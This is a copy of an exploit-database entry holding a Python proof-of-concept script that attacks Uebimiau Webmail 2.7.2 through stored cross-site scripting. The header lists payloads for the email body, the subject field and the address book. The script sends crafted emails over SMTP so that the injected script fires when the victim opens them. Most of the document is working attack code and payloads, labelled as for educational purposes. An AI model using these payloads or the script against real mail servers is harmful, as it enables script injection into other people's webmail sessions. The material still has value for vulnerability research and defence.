扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 |
#!/usr/bin/python ''' # Exploit Title: Uebimiau Webmail Stored XSS # Date: 17/08/2012 # Exploit Author: Shai rod (@NightRang3r) # Vendor Homepage: http://www.uebimiau.org/ # Software Link: http://www.uebimiau.org/downloads/uebimiau-2.7.2-any.zip # Version: 2.7.2 #Gr33Tz: @aviadgolan , @benhayak, @nirgoldshlager, @roni_bachar About the Application: ====================== Uebimiau is an universal webmail developed in PHP by Aldoir Ventura. It is free and can be installed in any email server. -It runs under any System; -It doesn't require any extra PHP modules; -Doesn't need a database (as MySQL, PostreSQL,etc) -Doesn't need IMAP, but compatible with POP3 and IMAP -Compatible with the MIME Standard (send/receive text/html emails); -Doesn't need cookies; -Easy installation. You only modify one file; -Compatible with Apache, PHP, Sendmail or QMAIL; -Can be easily translated into any language (already translated in 17 languages); -Can use a variety of skins Vulnerability Description ========================= 1. Stored XSS in e-mail body. XSS Payload: <scr<script>ipt></scr</script>ipt>'//\';alert(String.fromCharCode(88,83,83))//\";</script> Send an email to the victim with the payload in the email body, once the user opens the message the XSS should be triggered. 2. Stored XSS in "Title" field ( works when victim opens message in full view). XSS Payload: SubjectGoesHere"><img src='https://www.exploit-db.com/exploits/20675/1.jpg'onerror=javascript:alert("XSS")> This one requires you to send at least 2 messages to the victim with the payload in the email subject. Location of injection in page source: <a class="menu" href="https://www.exploit-db.com/exploits/20675/readmsg.php?folder=inbox&pag=1&ix=1&sid={4F0FCD8FECD59-4F0FCD8FECD6C-1326435727}&tid=0&lid=5" title="Uebimiau Webmail Stored XSS POC "><img src='https://www.exploit-db.com/exploits/20675/1.jpg'onerror=javascript:alert("XSS")>">Next</a> :: <a class="menu" href="javascript:goback()">Back</a> :: 3. Stored XSS in Address Book XSS Payload: <script>alert("XSS")</script> Create a new contact with the XSS Payload in the "Name" field, Save contact, XSS Should be triggered when viewing contacts. ''' import smtplib print "###############################################" print "#Uebimiau Webmail Stored XSS POC#" print "#Coded by: Shai rod #" print "# @NightRang3r#" print "# http://exploit.co.il#" print "# For Educational Purposes Only!#" print "###############################################\r\n" # SETTINGS sender = "attacker@localhost" smtp_login = sender smtp_password = "qwe123" recipient = "victim@localhost" smtp_server= "10.0.0.5" smtp_port = 25 subject = "Uebimiau Webmail Stored XSS POC" xss_payload_1 = """ "><img src='https://www.exploit-db.com/exploits/20675/1.jpg'onerror=javascript:alert("XSS")>""" xss_payload_2 ="""<scr<script>ipt></scr</script>ipt>'//\';alert(String.fromCharCode(88,83,83))//\";</script>""" # SEND E-MAIL print "[*] Sending E-mail to " + recipient + "..." msg = ("From: %s\r\nTo: %s\r\nSubject: %s\n" % (sender, ", ".join(recipient), subject + xss_payload_1) ) msg += "Content-type: text/html\n\n" msg += """Nothing to see here...\r\n""" msg += xss_payload_2 server = smtplib.SMTP(smtp_server, smtp_port) server.ehlo() server.starttls() server.login(smtp_login, smtp_password) print "[*] Sending Message 1\r" server.sendmail(sender, recipient, msg) print "[*] Sending Message 2\r" server.sendmail(sender, recipient, msg) server.quit() print "[+] E-mail sent!" |
体验盒子
